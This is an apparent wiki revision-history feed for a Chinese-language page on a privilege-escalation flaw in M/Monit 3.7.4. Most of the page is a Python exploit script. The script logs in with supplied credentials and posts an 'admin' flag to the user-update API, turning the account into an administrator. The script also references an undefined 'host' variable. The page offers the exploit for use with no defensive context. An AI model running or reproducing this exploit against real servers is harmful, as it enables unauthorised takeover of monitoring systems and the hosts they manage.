https://pwnwiki.com/index.php?action=history&feed=atom&title=M%2FMonit_3.7.4_%E6%AC%8A%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E%2Fzh-cn M/Monit 3.7.4 權限提升漏洞/zh-cn - Revision history 2026-04-15T08:03:47Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=M/Monit_3.7.4_%E6%AC%8A%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E/zh-cn&diff=4992&oldid=prev Pwnwiki: Created page with "M/Monit 3.7.4 权限提升漏洞" 2021-06-13T01:51:35Z <p>Created page with &quot;M/Monit 3.7.4 权限提升漏洞&quot;</p> <p><b>New page</b></p><div>&lt;languages /&gt;<br /> ==影响版本==<br /> &lt;pre&gt;<br /> Version : 3.7.4<br /> &lt;/pre&gt;<br /> <br /> ==EXP==<br /> &lt;pre&gt;<br /> import sys<br /> import requests<br /> <br /> url = 'http://your_ip_here:8080'<br /> username = 'test'<br /> password = 'test123'<br /> <br /> sess = requests.Session()<br /> sess.get(host)<br /> <br /> def login():<br /> print('Attempting to login...')<br /> data = {<br /> 'z_username':username,<br /> 'z_password':password<br /> }<br /> headers = {<br /> 'Content-Type':'application/x-www-form-urlencoded'<br /> }<br /> <br /> resp = sess.post(url + '/z_security_check', data=data, headers=headers)<br /> if resp.ok:<br /> print('Logged in successfully.')<br /> else:<br /> print('Could not login.')<br /> sys.exit(1)<br /> <br /> def privesc():<br /> data = {<br /> 'uname':username,<br /> 'fullname':username,<br /> 'password':password,<br /> 'admin':1<br /> }<br /> resp = sess.post(url + '/api/1/admin/users/update', data=data)<br /> <br /> if resp.ok:<br /> print('Escalated to administrator.')<br /> else:<br /> print('Unable to escalate to administrator.')<br /> <br /> return<br /> <br /> if __name__ == '__main__':<br /> login()<br /> privesc()<br /> &lt;/pre&gt;</div> Pwnwiki